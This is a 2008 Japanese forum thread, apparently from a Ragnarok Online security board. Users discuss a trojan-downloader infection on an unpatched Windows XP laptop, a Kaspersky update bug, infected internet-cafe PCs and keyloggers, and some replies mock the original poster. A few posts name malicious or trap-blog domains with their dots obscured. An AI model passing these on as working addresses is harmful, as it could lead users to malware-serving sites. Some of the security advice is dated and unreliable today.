【hosts変更】無
【PeerGuardian2導入】無
【説明】
・svchostが普段３個が4個起動されている
・TCP5000とUDP6876のポートをLISTENしてるぽい（fportより。実行ファイルは空欄)
・ネットにつなげておくと「win英数字ランダム5文字.exe」（26624バイト)と
　「英数字ランダム8文字ぐらい.exe」（こっちは消してしまった）
　がダウンロードされて実行される
　http://www■virustotal■com/jp/analisis/51395846e51168339cc5337f92caf83d
・rootkitbuster2.2.1014を起動したがなにもみつからない
・さらにしばらくあとに起動してみたらファイルサイズが2,277,376バイトに増えて
　（ダウン直後は2,200,032バイト）Integrity testでerror
・ウィルスバスターのオンラインスキャンは起動後、データ接続開始あたりの２％で止められる
・kasperskyはそもそも見られない　orz
・avastのﾌﾘｰ版入れようとセットアップ起動するも、セットアップすら途中で止められる
・レジストリは他のrootkit系のさわりそうなところをざっと眺めたが見当たらず
・a-squaredのオンラインスキャンではrootkit.win32.agent.itとrootkit.win32.agent.jc発見検疫
　　しかしまだ症状かわらず

それなりのレベルなネットワーク系SEだと思ってるが、検出できんから対処方法がみつからん。。。
rootkitやbackdoorの系統の、本体見えない系だとは思うのだが、なにか情報もらえないかな
最近のSQLインジェクション使ったブログ系統の感染症状なのか判断がつかない。
まぁ最悪はゴーストでイメージあるから戻すだけなんだが、なんとかつぶしたい
RO関連のHPしかみてないから、こっちで質問してみました
＃気をつけててもアップデートしないとひっかかるんだなぁというのが実感。

316 ：（○口○*）さん sage ： 2008/04/19(土) 12:47 ID:H32ozt8t0

↓ほどほどにしてくれよ

317 ：（○口○*）さん sage ： 2008/04/19(土) 13:17 ID:WV5GzwjF0

いやー、ド素人な自分には何言ってるかサッパリッスよ〜
力になれなくてすいやせんね、ﾍﾍ

318 ：（○口○*）さん sage ： 2008/04/19(土) 13:28 ID:vikRQvVS0

それなりのSEとか言ってサービス一覧とかスタートアップ見てないのか?
「開始」されてるのだけ数えりゃせいぜい20〜30だろうし全部当たってみりゃいい

319 ：（○口○*）さん sage ： 2008/04/19(土) 13:43 ID:me5qBwY/0

>＃気をつけててもアップデートしないとひっかかるんだなぁというのが実感。
自称SEの方ですか？
回りに被害を広める前にさっさと再インストールしろ

320 ：（○口○*）さん sage ： 2008/04/19(土) 13:47 ID:hTltHr8d0

拾ってきたサイトも判らない
exeファイル名も判らない
そしてWindowsXP Home SP1

うちらにどうしろと
はいはいｱｯﾌﾟﾃﾞｰﾄしましょうねー、とでも言って欲しいのか

321 ：（○口○*）さん sage ： 2008/04/19(土) 14:09 ID:UEMR3v+60

>>320見てたら犬のおまわりさんが脳内で再生されたわｗｗｗ

322 ：（○口○*）さん sage ： 2008/04/19(土) 14:10 ID:CtuhdM0q0

それなりのレベルなネットワーク系SE（笑）

323 ：（○口○*）さん sage ： 2008/04/19(土) 14:21 ID:AkQgmSCQ0

スタートアップはレジストリからみてたが、サービス一覧から中に書かれてる全起動ファイル確認は見落としてたわ
さんくす＞３１８
まぁあやしげなのはとめたが変わらんようだ

ファイル名わかってれば対処ぐらい自分でするよ
欲しい情報は、ブログ感染系の奴の振る舞いの情報だったんだが。
感染後だから、アップデートは無意味だ
すでにネットから切り離していぢって遊んでるとこ

ちなみに、感染時は未発見、今は対策されたらしい
前述のファイルはTROJ_DLOADER.AHHとして検出されたわ
＃隔離したファイルを別PCで検出しただけだから、本体はtrendmicroつながらんのだけどな。

324 ：（○口○*）さん sage ： 2008/04/19(土) 14:32 ID:WV5GzwjF0

あぁ、釣りじゃないの
入れ食いだったから大喜びで宣言すると思ったのに

>>感染後だから、アップデートは無意味だ（ｷﾘｯ
じゃねーよ、最初からしておけよ　SP1ていつの話だよ

325 ：（○口○*）さん sage ： 2008/04/19(土) 14:45 ID:aVT8DoAC0

そもそも今のSEは何でもSEで、言ったもの勝ちな職種になってるから、
(業界関係者)と同じくらいの意味しかないぞ。

326 ：（○口○*）さん sage ： 2008/04/19(土) 14:51 ID:xphBn+iy0

使えないはメールとかの文章がルー大柴
ひどい奴はしゃべり方までルー大柴

一回オールデリートしてインストールをワンモアしちゃってよ

327 ：326 sage ： 2008/04/19(土) 14:52 ID:xphBn+iy0

使えないSEは　だ・・・
俺も使えないSE

328 ：（○口○*）さん sage ： 2008/04/19(土) 16:25 ID:eQqDh01e0

もはや、どこからどう突っ込むべきか・・・・・・・・・・

WindowsUpdateとセキュリティソフト完備(カスペかAntiVirのような対応の早いもの推奨）のPCも
HDDを外付で繋いでスキャンしてみれば、ルートキットも除去できるとは思うが、そこまでのものは
フォーマットでもしない限り回復不能だろう。多分、OSの基幹部分にまで食い込まれてる。

ダウンローダ＋WindowsUpdateで塞いでない大穴＝感染しまくり

なにをきっかけに、どこからどこまで食い込まれたか理解できっこないだろ。
>>315さんはそんなことよりも、ＯＳの再インストールの仕方から勉強した方がいいと思う。

わたしなら、検体を拾って各社に送付した後は、HDDユーティリティーをCDブートして、
HDDの物理フォーマットから始めますね。

329 ：（○口○*）さん sage ： 2008/04/19(土) 16:28 ID:4QbUcS/q0

XPSP3もそろそろ出るってのにSP1な奴は…。
Microsoftあたりが起動不能にしてくれんかねぇ。

330 ：（○口○*）さん sage ： 2008/04/19(土) 16:34 ID:BS+j+Nwt0

問題解決能力、分析能力の有無が、真っ当なSEと、なんちゃってIT土方の間に存在する越えられない壁だな。

331 ：（○口○*）さん sage ： 2008/04/19(土) 16:40 ID:eQqDh01e0

>>330
ここまで分析能力がないと、役立たずでしかないんだが…。
IT土方でも、自分がなにをやってどうなったのかの理解は最低条件じゃないのかなー。

越えられない壁の、手前にも届いてないと思う。

332 ：（○口○*）さん sage ： 2008/04/19(土) 16:51 ID:2zGRuN/D0

>328
>315は「それなりのレベルなネットワーク系SE」ですよ？
>ＯＳの再インストールの仕方から勉強した方がいいと思う。
これくらい、当然知ってますって ＾＾

と、>315を煽りたくなるぐらいの酷さだよな……

自分自身を過剰・課題に評価してるような自称SEは、OSの
再インストールの勉強以前に、学ぶ事があるよ。

333 ：315 sage ： 2008/04/19(土) 22:16 ID:AkQgmSCQ0

まぁゴーストのイメージから復帰させたからどーでもいいんだが。
これ、友人のノートなんで、俺にネットワークSEを説かれてもなぁ
＃まぁ書いてないからそういわれても仕方ないか。ポップアップは全て
＃キャンセルとか教えてたぐらいで放置してたからな
こんなノート渡されて、やれることはやったと思うんだがどーよ。

欲しいのは対処法じゃなくて、ブログ系だけでこーなるのかどーかだったんだ
まぁ世の中、アップデートしてるのが普通だと思うんだが、中にはしてない奴も
いるんだなーということ。

334 ：（○口○*）さん sage ： 2008/04/19(土) 22:29 ID:5fUrOern0

長期にわたってアップデートしてないWindows XP SP1で罠ブログを踏むと
どういう状況に陥るか理解できないの？

335 ：（○口○*）さん sage ： 2008/04/19(土) 22:42 ID:eQqDh01e0

>>333
まともに応対するだけの価値がないことがわかった。

336 ：（○口○*）さん sage ： 2008/04/19(土) 22:59 ID:me5qBwY/0

俺ならノートPCを投げ捨てて終わりにする
1分もかからず解決だ

337 ：（○口○*）さん sage ： 2008/04/19(土) 23:40 ID:yS6BiP+t0

Security
Empty

の略だったんだよぉぉぉ！１！！！１

誰かいい略称を頼む

338 ：（○口○*）さん sage ： 2008/04/19(土) 23:42 ID:WV5GzwjF0

おぉ、まだやっとったんかｗ

339 ：（○口○*）さん sage ： 2008/04/19(土) 23:44 ID:xphBn+iy0

>>333
捨て台詞はいいから早くそのノーと捨てて来い

340 ：（○口○*）さん ： 2008/04/20(日) 00:24 ID:OV/0sayVO

カスペ使ってるやつ南無、ついでに俺も南無

341 ：（○口○*）さん sage ： 2008/04/20(日) 00:25 ID:gM7YZn650

>こんなノート渡されて、やれることはやったと思うんだがどーよ。

まともに駆除出来るかどうか判らん状態でやれる事なんざ、再インストールしかない。
リカバった所で、ゴーストのイメージが汚染されてる恐れもあるし、そのままだと
即再発する。

>欲しいのは対処法じゃなくて、ブログ系だけでこーなるのかどーかだったんだ

「ブログ系だけでこーなるのかどーか」なんてちょっとセキュリティを齧れば判ること。
ましてや「それなりの」なんて自負してるネットワークSEなら、聞かなくても判るだろ。

そのノートが本当に他人のかどうか知らんけど、なぜ>333のレスの後もツッコミが
入ってるのか、よく考えた方がいい。

342 ：（○口○*）さん sage ： 2008/04/20(日) 01:58 ID:TwEhw0Wm0

自分で管理できてるものじゃない上に、思い当たるような原因もなし、
そんな条件の切り分けが出来てない状況で、
特定しようなんて、マゾか馬鹿のどちらかしなないと思うが。
さらに、そんな状況で技術的な話をしましょうなんて、
SEどころか人間扱いされなくても文句言えないぞ。

343 ：（○口○*）さん sage ： 2008/04/20(日) 02:41 ID:24ALICNa0

>>340
?

344 ：（○口○*）さん sage ： 2008/04/20(日) 03:14 ID:rt8I2chq0

セキュ板のカスペスレチラ見したらなんかあったっぽく荒れてるね

345 ：（○口○*）さん sage ： 2008/04/20(日) 06:21 ID:1rmhJ8CE0

【　 　 　 気付いた日時　 　 　 　 　 】 今しがた
【不審なアドレスのクリックの有無　】 踏みました
【　　アドレス 　 】ragnarocks■com/
【　 　　 OS　 　 】WindowsXP Home SP2
【使用ブラウザ 】Opea 9.27
【　アンチウイルスソフト 】 avast! 4.8
【 ウイルススキャン結果】 カスペルスキーオンラインスキャンで検知なし
【テンプレの参考サイトを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
PCを買い換えたので、見た目シミュレータのRagnarocks.comをブックマークするため「Ragnarocks.com」でググり、
一番上にあったこのアドレスを開いてしまった
英語なせいでよくわからないが、単にドメインを売っているサイトだろうか…？

346 ：（○口○*）さん sage ： 2008/04/20(日) 07:10 ID:MWtvt7xg0

自分の管理している環境ではない→普段どういう使い方をしているか全てを把握できている訳ではない。
この状況で、踏んづけたトロイ以外には何も入っていないという保証なんて誰ができようか。
そもそも、踏んだのは>>315本人なのか、それとも友人とやらなのか?

こんな不確実な状況で、少なくても自分なら、(誰が何時の時点で取得したかも判らない)Ghostイメージからの復元なんて考えない。
更のOS、ノートPCならリカバリメディアや領域からのクリーンインストール、併せてWUなどのセキュリティアップデートを提案するよ。
そういった、リスクを相手に納得させ、承諾させる過程や行為。それと、納得しないなら匙を投げるのもスキルのうちだよな。

そこから先の、個人的な検証や解析とやらは、検疫した検体で好きにすればよい。
但し、他人に迷惑を掛けない範囲で。

347 ：（○口○*）さん sage ： 2008/04/20(日) 12:05 ID:OV/0sayVO

今カスペでバグ発生中。注意。

348 ：（○口○*）さん sage ： 2008/04/20(日) 12:15 ID:OV/0sayVO

常時接続などで長時間・期間PC起動している人
メモリを大量消費するアプリ使用後・作業後は
暇を見つけては時々カスペをいったん終了・再起動で
十分なメモリ・リソースを開放してあげましょう。

349 ：（○口○*）さん sage ： 2008/04/20(日) 12:17 ID:zLfdgL6r0

>>345
ドメインの支払いが滞ったとかでドメイン業者の広告になってるだけだろ。

350 ：（○口○*）さん sage ： 2008/04/20(日) 12:52 ID:4XMEvjoi0

>>347,348
どんなバグ？公式に載ってないようだけど

351 ：（○口○*）さん sage ： 2008/04/20(日) 12:59 ID:4XMEvjoi0

ごめん、セキュ板みて自己解決した
Windows全体が突然文字消えとかして画面バグるやつか
うちでも昨日からなってて別の原因だと思ってた。カスペのせいだったのか

352 ：（○口○*）さん sage ： 2008/04/20(日) 13:11 ID:OV/0sayVO

公式にはまだ乗ってない模様。XPSP2は完全NGほかのでも多数報告ありでKIS使用者起こる。

対策はあるが目眩まし程度なのでカスペの対策待ちといったところです。

353 ：（○口○*）さん ： 2008/04/20(日) 13:14 ID:OV/0sayVO

発症条件は3日前の再起動の更新です！

354 ：（○口○*）さん sage ： 2008/04/20(日) 13:18 ID:MWtvt7xg0

KISの問題はリソースリークの症状に似ている感じがするな。
ユーザーが増えること自体は悪くないのだけど、トラブル発生時に問題が拡大するのと裏腹か。

>>345
多分、
誤) ragnarocks■com
正) ragnarockcs■com
なのではないかな。
後者は少なくとも、それっぽいサイトに辿り着けた。中身の精査まではしていないけど。

人間の記憶なんて怪しいものだし、時としてtypoや思いこみに起因する間違いも起こりやすい。
今は幸いにして、USBフラッシュメモリが破格で売られている。4GBで2000円以下とか、良い時代になったものだ。
Operaなら、%USERPROFILE%\Application Data\Opera\Opera\profileフォルダをコピーしておけば、ブックマーク丸ごと
他の環境に移し変え可能。

355 ：（○口○*）さん sage ： 2008/04/20(日) 13:35 ID:gM7YZn650

>353
その更新掛けたけど、言われてる症状は出てないな。
XP Pro SP2な環境なので、出るはずなんだが。

しかしセキュ板は相変わらずの状態で情報検索がしにくいのが困る。

356 ：（○口○*）さん sage ： 2008/04/20(日) 13:53 ID:OV/0sayVO

多分、10時間起動しても出ないやつもいるし、PCによりけりってところだと思いますよ。俺も2時間ラグナやってるくらいじゃあ問題なかったし　

ただ、今ないからって油断は禁物ってことかな

357 ：（○口○*）さん sage ： 2008/04/20(日) 14:09 ID:kf7UeqiJ0

漏れは20時間起動してたが問題なかったな
まあスペックによりけりな気がするが

358 ：（○口○*）さん sage ： 2008/04/20(日) 14:39 ID:TlopJMBB0

カスペの件、朝起きたらなってた。昨日の夕方に再起動してたので12時間前後で発生か。
直前に入れ替えたカタリスト8.4のせいかと思ってたよ。

WinXP SP3(RC3) ／ RadeonHD3870 ／ 3.25GB ／ Athlon64 X2 4600+

359 ：（○口○*）さん sage ： 2008/04/20(日) 14:45 ID:TlopJMBB0

総合スレ608
nice bot.

次からはセキュスレ逝けってコメントついてんだから、お前さんの誘導は蛇足だ。

360 ：（○口○*）さん sage ： 2008/04/21(月) 00:23 ID:GwLYdq0o0

もうあっちのスレいらないだろ

361 ：（○口○*）さん sage ： 2008/04/21(月) 00:30 ID:zW3a6FZc0

総合スレ9-609〜610

｜609 (^ー^*)ノ〜さん sage 08/04/20 18:58 ID:sIMAMXhj0
｜Nice bot.
｜
｜610 (^ー^*)ノ〜さん sage 08/04/20 23:19 ID:EaTOsuLN0
｜Nice bot.

人の振り見て我が振り直せ。お前さん方も優秀なBOTになってるじゃねーか。

362 ：（○口○*）さん sage ： 2008/04/21(月) 00:35 ID:HFJF9SLJ0

しつこく誘導張るのもアレだが、糞レスしておいて誘導キチガイとか抜かす奴も同程度だ

363 ：（○口○*）さん sage ： 2008/04/21(月) 00:36 ID:GCPek+8A0

あっちのスレがいらないというか、いる場所が逆のような気がする
割と貴重な話が出ることもあるこのスレが、なんでらいぶろにあるのかと
管理者側で対策されれば消える・個別案件ばかりで全体的な話にならない垢ハックの方が、
長く置いておく必要性が本当にあるのかと

だから垢ハック対策は適当でいい、とは言わないが、
向こうのスレの現状とか見てると、どうももやもやする

364 ：（○口○*）さん sage ： 2008/04/21(月) 00:45 ID:13XbZQY40

>>361
そういう貴方様もあっちの事をこっちで蒸し返す高性能BOTですね
>>284も貴方様でしょ？
確信犯でやっているのに人の振りして治せって言っても
馬の耳に念仏じゃな

365 ：（○口○*）さん sage ： 2008/04/21(月) 01:14 ID:T8LA4Hfz0

誘導張った奴に対してお前はBOTかという皮肉なんだろうね。
どっちも気持ちはわからんでも無いが、本当にあそこの状態はどうにかせんとあかんなぁ。

366 ：（○口○*）さん sage ： 2008/04/21(月) 01:15 ID:qCvvxqSR0

もう長いこと変なのに目を付けられてるしなんとかしないとね
あれの所為で馬鹿がネタとしてレス付けたりもしてるし

367 ：（○口○*）さん sage ： 2008/04/21(月) 10:11 ID:1dZ/j7CH0

向こうのスレは粘着君のお陰で機能不全に陥ってるとしか。
幸い(?)危険URLの報告は減少してるし、全てこちらで扱ったほうが良いような気がする。

もしこの手のスレがLiveRoにしかないのが問題というなら、(スレタイは考えるとして)
セキュスレを向こうに持っていく、というスタイルにするとか。

368 ：（○口○*）さん ： 2008/04/21(月) 21:35 ID:M1AaPZi+O

カスペバグ解決したみたいです。カスペルスキーユーザーは直ちに更新をすることをオススメいたします。これで解決するはずです

スレ汚しすまん。では健闘を祈る。

369 ：（○口○*）さん sage ： 2008/04/21(月) 21:36 ID:wVo+IcMH0

カスペが定義の更新処理で落ち着いたみたい

370 ：（○口○*）さん sage ： 2008/04/21(月) 22:04 ID:z1RQI+Nx0

更新したあとはカスペを再起動するといいようだ

371 ：（○口○*）さん sage ： 2008/04/22(火) 02:07 ID:GuH70YQI0

セキュスレはあの有様だし、こっちで聞いてみる
カスペのMP1って入れてる？
最初配布されたやつが不具合あってダメだというんで入れてなかったんだが、
今回再配布されたやつはマシになってるのかな

372 ：（○口○*）さん sage ： 2008/04/22(火) 02:51 ID:gnmyKVps0

>371
初回版のMP1でも問題が出てなかったのでそのまま運用。
修正版のMP1が出たときに切り替えたけど、共に問題なし。

初回版でも無印より良くなってると感じてた。

373 ：（○口○*）さん sage ： 2008/04/22(火) 14:10 ID:yyrxcsMq0

エラースレからコピペ。これでようやく一安心。

484 (^ー^*)ノ〜さん sage 08/04/22 13:37 ID:BQgXCEOo0
>>479
http://www.just-kaspersky.jp/
公式発表来たね。以下お知らせコピペ。

======================
2008.04.22
Kaspersky Internet Security 7.0において、4/17夜間に配信したドライバの更新に不具合があり、
一部の環境ではWindowsの表示が不正になったり、動作が遅くなる現象が4/17以降に確認されています。
4/21 20:00以降の定義データベースの配信で修正しておりますので、現象が発生しているお客様は、
最新の定義データベースの適用をお願いいたします。お客様にはご迷惑をお掛けして申し訳ございません。
現象が解決しない場合は、カスペルスキー専用サポートセンターにお問い合わせください。
======================

374 ：（○口○*）さん sage ： 2008/04/23(水) 00:41 ID:L+CdsQIiO

MP1で不具合とか不満ないやつは希少種。

375 ：（○口○*）さん sage ： 2008/04/23(水) 00:44 ID:8InFobiz0

>>374
具体的にどんな不具合が出てるのかkwsk

376 ：（○口○*）さん sage ： 2008/04/23(水) 08:58 ID:/EVN7uab0

質問させて頂きます
ＯＳ：vista prenium
windows updateは最新でプレイしています

4/22のメンテ後寝露店をさせていたところ
不正変更の監視：拒否数１
NtUserSetWindowsHookEx　を拒否しました云々とでました
RagEXE.EXEらしいのですが、先週までは何も出ず4/22のメンテ後
ＲＯにinしてるとでるようです。

ウイルスバスター2008使用ですが、nPro関係の誤動作かなにかでしょうか？
ROをやる上でやっておくべきことなどありましたら
ご存じの方いらしゃいましたらアドバイスいただけますか？
よろしくお願いします。

377 ：（○口○*）さん sage ： 2008/04/23(水) 10:19 ID:rRUiBIzi0

>>376
NtUserSetWindowsHookEx　で　ぐぐってみるといくつか情報があるようです。
ウィルスバスターのイベントに残ったログをみて
対照ファイルが問題ないようでしたらバスターの設定で
それについてスルーするように設定すればいいようですよ？

378 ：（○口○*）さん sage ： 2008/04/24(木) 12:38 ID:DT7FJH5rO

今までのカスペよりさらに重くなったり、回線速度が半端なく下がったり、意味不明なエラーにあったりくらいかな　これは、全く起こらない人もいるし試してみるといいさ　気になるなら

379 ：（○口○*）さん sage ： 2008/04/24(木) 19:01 ID:0rMdY5Nf0

単にふと思っただけではありますが質問

垢ハックのウィルスには、キーロガータイプとパケット盗聴タイプと2種類あると思いますが、
もし何の関係も無い単語から変換されるように予め辞書登録してあり、その変換によって
IDパスを入力しログインした場合、キーロガータイプのウィルスによってはIDパスは盗まれませんか？
と言うかキーロガーの仕組みをよく分かっていないんですが
キーロガーとは純粋にキーボードのキーを押したログのみを取るものなんでしょうか。

IDパスを辞書登録と言うのは別の面で色々と問題があるだろう事は知っているので
辞書登録をもってウィルス対策にしようとか考えている訳ではないですが、よろしくお願いします。

380 ：（○口○*）さん sage ： 2008/04/24(木) 19:09 ID:GTUenoth0

キーボードとIMEの間に割り込んでるなら抜き取れない可能性もありますが、
まず間違いなく無駄です。

381 ：（○口○*）さん sage ： 2008/04/24(木) 19:23 ID:KbuynQYN0

できの悪い敵には効果があるかもしれないけど、相手はあらゆる手段で
金品やそれに繋がる情報を奪い盗ろうとしてくるわけで……

382 ：（○口○*）さん sage ： 2008/04/24(木) 20:50 ID:0rMdY5Nf0

>>380-381
キーロガーもそんな単純じゃないって事ですね。
ありがとうございました。

383 ：（○口○*）さん sage ： 2008/04/24(木) 21:41 ID:rkHYDVbA0

KEYKatcherやKeyGhostのように、キーボード-PS2端子間に咬ませるハードウェア型には一定の効果があるが、ソフトウェアの
場合、大抵はIMEからメッセージとして送られた文字列そのものも見ているだろうから、効果は薄いだろう。

384 ：（○口○*）さん sage ： 2008/04/25(金) 08:19 ID:7iNQ5eC70

>>377さん

風邪で寝込んでいてお礼が遅くなり申し訳ございません
レスどうもありがとうございました
参考にさせていただきます

385 ：（○口○*）さん sage ： 2008/04/25(金) 18:06 ID:gsMgelCR0

スパイウェア対策機能が追加された「AVG Anti-Virus Free Edition」v8.0が公開
http://www.forest.impress.co.jp/article/2008/04/25/avgantivirusfree8.html

386 ：（○口○*）さん sage ： 2008/04/25(金) 18:25 ID:XfRpdjLR0

FC2は水面下で揉み消しを行っていたのだろうか?

265 名前：既にその名前は使われています[] 投稿日：2008/04/24(木) 22:21:20.93 ID:kXzuopcm
FC2、今頃になって一部の被害ブログ主からの問い合わせメールに返答かえしてるのか？
戦士スキーのブログにそれらしき記述がある。

ーーーーー抜粋ここから
FC２に出していた問い合わせメールの返信内容。
(中略)
何の報告もないまま一週間が経過したので返事を催促したところ
・iframeタグが有害であるため、即日運営側にて削除したこと
・当該改竄は中国IPからの不正ログインであること
・対策以前の改竄で、今回の対策完了によりHPスペースも安全であるとのこと
・iframeタグの削除が連絡無しで行われたことに対する謝罪
ｅｔｃが丁寧に返信されてきました。
(中略)
マスメディアのように一斉にFC2を叩いていてもしょうがないですよ、というお話。
ーーーーーここまで
事実上利用者数をアメーバに抜かれて引き止めに必死とも見えるし、人の噂も何とやら狙いかもしれない。
>・iframeタグが有害であるため、即日運営側にて削除したこと
では今まで何してたよ？虫がよすぎる返答がFC2らしい。

266 名前：既にその名前は使われています[] 投稿日：2008/04/24(木) 23:15:23.71 ID:6cy1p+Fd
連絡なしでiframeを消すって、一見ナイス判断に思うかもしれないが
その裏でいったいどれだけのブログを修正してきたんだろうな。
どうせiframeが仕込まれてたのがわかると移転騒ぎが大きくなるからコッソリ直してたんだろ？
そうでなきゃ利用者が問い合わせるまでダンマリとかありえねぇ。

387 ：（○口○*）さん sage ： 2008/04/25(金) 22:54 ID:M4z1+1ki0

iframeタグが有害・・・・

ニコニコ動画のタグに確か…

388 ：（○口○*）さん sage ： 2008/04/26(土) 01:58 ID:Nqkmyrdp0

>>385
今7.5使ってるけど、8.0に再ｲﾝｽｺするしかないのかしらん？

389 ：（○口○*）さん sage ： 2008/04/27(日) 01:23 ID:anLYg7790

自己解決
上書きｲﾝｽｺできますた

390 ：（○口○*）さん sage ： 2008/04/27(日) 18:43 ID:KZ7qTREw0

RealPlayer11が11.0.3になってた。
こっそりバージョンアップするのやめてくれよ…。
更新の確認しても出てこないし。

391 ：（○口○*）さん sage ： 2008/04/27(日) 22:04 ID:xJIvBCPD0

ネカフェの下調べに行ってきた。
全国チェーンのネカフェで　再起動すると中身が削除されるシステムらしいが
念のため電源切って入れて（not再起動）
kasper　onlineスキャナぽちっとな。

…ウィルス感染1
疑わしいコンテンツ　山盛り
…地方の怪しいところじゃなくて全国ﾁｪｰﾝの割と有名どころだったんだが…
動揺してｳｨﾙｽ名ﾒﾓしてくるの忘れた
３倍でも恐くて行けないなぁ

392 ：（○口○*）さん sage ： 2008/04/28(月) 01:13 ID:20l2bpzA0

個人的に3倍で普段行かない人もネカフェ行って
ぷち垢ハック祭りになるのを勝手に予想してる

393 ：（○口○*）さん sage ： 2008/04/28(月) 01:57 ID:KGxiLf0e0

個人的じゃなく発表合ったときから散々言われてることなんだが
今更何なんだ？

394 ：（○口○*）さん sage ： 2008/04/28(月) 02:31 ID:hOBjDZTh0

>>391
事実確認情報として、店舗名を挙げて貰えないと有益な情報というには弱い気がする。
あと、店員にははっきり伝えたんだろうな。言わないと、改善されないぞ。

395 ：（○口○*）さん sage ： 2008/04/28(月) 03:00 ID:z7fuHfBX0

下調べしたかっただけで改善は目的じゃないんじゃないの
>>391に改善するように動けと言うのも身勝手に思える

396 ：（○口○*）さん sage ： 2008/04/28(月) 21:46 ID:/q8yg+vX0

>>391
…店員さんには言わなかった…
液晶もたまに黄色く変色したり変だったのですが満杯みたいでﾁｪﾝｼﾞできなかった＋騒ぎになると時間かかるし面倒なのでｲﾔだった。というエゴの塊です。

ﾊｲｽﾍﾟｯｸﾀｲﾌﾟじゃなくてビジネスブースの方だったからチェックされてなかったのかもとか
そのお店で使ってる再起動すると中身が消えるシステムが誤認識されてたのかもしれないし（そういうのあり？＜kasper）

やっぱりｳｨﾙｽ名とその他の怪しいのをきちんとﾒﾓしておけば良かったですね…
「重要な部分のみ」では引っ掛からず「Cﾄﾞﾗｲﾌﾞ全体」だとぼこぼこ出てきました。
kasper　DLするのに1時間（回線速度10M出てたみたいなんですが異様に遅かった。冗談抜きで1時間）ﾁｪｯｸするのに1時間かかってしまったので疲れ果てて帰ってしまいました。正直あそこはもう行きたくないです…

具体的名は営業妨害ﾆﾀﾞと言われると困るので上げません…ごめんなさい。
ただ、（今まで散々言われていたことですが）ネカフェは大きいチェーン店でも危ないよ、という一例を雑談として。

対策として
●1dayなら家で課金してから行く（ｱﾄﾗｸｼｮﾝﾊﾟｽは抜かれないで済む）
●ﾛｸﾞｲﾝ前にkasperskyなどonlineﾁｪｯｶｰでちゃんとチェックしてから

●ｷｬﾗごとに数字ﾊﾟｽﾜｰﾄﾞを変えておく
●ﾛｸﾞｲﾝするのは必要最低限のｷｬﾗのみ
●お財布ｷｬﾗに重要な装備持たせ、お財布ｷｬﾗではﾛｸﾞｲﾝはしない
●帰宅後すぐにログインIDを変更する

くらいしか対策思いつかないなぁ

397 ：（○口○*）さん sage ： 2008/04/28(月) 21:47 ID:/q8yg+vX0

ってなに自分にれうしてんのorz
自分が391です…

398 ：（○口○*）さん sage ： 2008/04/28(月) 22:52 ID:WMt+YoGt0

>>396
注意喚起のために店名も書いてほしいぞ
名前の一部伏せるとかさ

399 ：（○口○*）さん sage ： 2008/04/28(月) 23:58 ID:h1UP8bQc0

すみません、垢ハックURLをマヌケにも踏んでしまいました。
URLを調べてみると、真っ黒です。
そのサイトを開いたブラウザはFireFoxで、表示は真っ白。
ソースを見るとVBScriptで記述されてました。
FireFoxはVBScriptをサポートしていないと公式に書かれていますが、
大丈夫でしょうか？

ノートンのスキャンでは検出できず、現在Ad-AwareとSpybot、
カスペルスキーのオンラインスキャンを走らせています。

400 ：（○口○*）さん sage ： 2008/04/29(火) 00:15 ID:wGSg/i/y0

すみません、相談用のテンプレに今気がつきました。

【　 　 　 気付いた日時　 　 　 　 　 】 08/04/28 23:50
【不審なアドレスのクリックの有無　】有
【　　アドレス 　 】www■skywebsv■com/Blog/index1■htm
【　 　　 OS　 　 】WindowsXP Home SP2
【使用ブラウザ 】FireFox 2.0.0.14
【WindowsUpdateの有無】自動更新
【　アンチウイルスソフト 】 NortonInternetSecurity2008
【その他のSecurty対策 】 Spybot, Ad-Aware SE
【 ウイルススキャン結果】 ノートンで未検出
【テンプレの参考サイトを読んだか】 今から読みます
【hosts変更】無
【PeerGuardian2導入】無
【説明】
ソースを見るとVBScriptで記述されてました。
FireFoxはVBScriptをサポートしていないと公式に書かれていますが、
大丈夫でしょうか？

401 ：（○口○*）さん sage ： 2008/04/29(火) 01:08 ID:D4J9YuiA0

>398
うーん…店名はどうのよりもやっぱり

ネカフェでやるなら先にウィルスチェック汁　だね。


…GW中は+100円になるところとだけ言っておく。

402 ：（○口○*）さん sage ： 2008/04/29(火) 03:44 ID:MOe0UZ6X0

それ公認ネカフェとして存在が間違ってるんだから
名前出すのが嫌ならしょうがないが、せめてヘルプデスクあたりから苦情流してほしい
でないと、次の別のうっかりさんがひっかかってしまう可能性があるから…

403 ：（○口○*）さん sage ： 2008/04/29(火) 09:10 ID:D3kiuWhO0

全ての店に危険の可能性があるいじょうひとつやふたつ店名だしても意味ないんじゃね。
それに店名出して万が一訴えられると、迷惑こうむるのは俺らじゃなくてらいぶろの管理人だし。
伏せ字にすりゃあ許されるってものでもない。

ヘルプデスクに苦情はやっておくべきだとは思う。

404 ：（○口○*）さん sage ： 2008/04/29(火) 15:45 ID:hwe9PTw60

>>399
VBScriptはIEでしか動作しない。
<script>ほげほげ</script>みたいにtypeやlanguage属性無しだと
見分け付かんけど、その辺は大丈夫?

405 ：399 sage ： 2008/04/29(火) 17:57 ID:wGSg/i/y0

>>404
返答ありがとうございます。
ソースチェッカーで確認したところ、exeをダウンロードさせるコードは
language属性でVBscriptが指定されていました。
ノートン、Ad-ware、Spybotおよびカスペルスキーのオンラインスキャン
でのフルスキャンの結果は、全て問題なし。
念のため、安全なPCからパスワードを変更後、PG2を導入しました。
PG2がブロックしている形跡があるということは、
やはり感染の疑いがあるということでしょうか？

406 ：（○口○*）さん sage ： 2008/04/29(火) 18:19 ID:hwe9PTw60

>>405
んじゃ動いてないね。無関係なんじゃね? Wikipedia(韓国サーバ)とか。
ブラウザのキャッシュにはそのscript込みのファイルが入っていて
それを検知するかもしれんのでキャッシュは削除しておくこと。

407 ：399 sage ： 2008/04/29(火) 18:32 ID:wGSg/i/y0

>>406
キャッシュ等は全てクリアしました。
PG2がブロックしたIPの中に、危険ドメインリスト入りしている
www■ahwlqy■comがあったため、もしかして？と思い書き込みました。
ロストすると致命的となるものを退避させ、しばらく様子を見ようと思います。
ありがとうございました。

408 ：（○口○*）さん sage ： 2008/04/29(火) 18:56 ID:FRruey6G0

また、どっかの失効したドメインをそのアドレスと検知してるだけじゃねーの？

409 ：（○口○*）さん sage ： 2008/04/29(火) 23:50 ID:wkfkAXcH0

「Lhaplus」に新たな脆弱性、ZOO形式の展開時にバッファオーバーフロー
ttp://internet.watch.impress.co.jp/cda/news/2008/04/28/19388.html

zoo形式は殆ど使われてない(と思う)から影響薄いだろうけど。

410 ：（○口○*）さん sage ： 2008/04/30(水) 10:38 ID:qdj+pN9H0

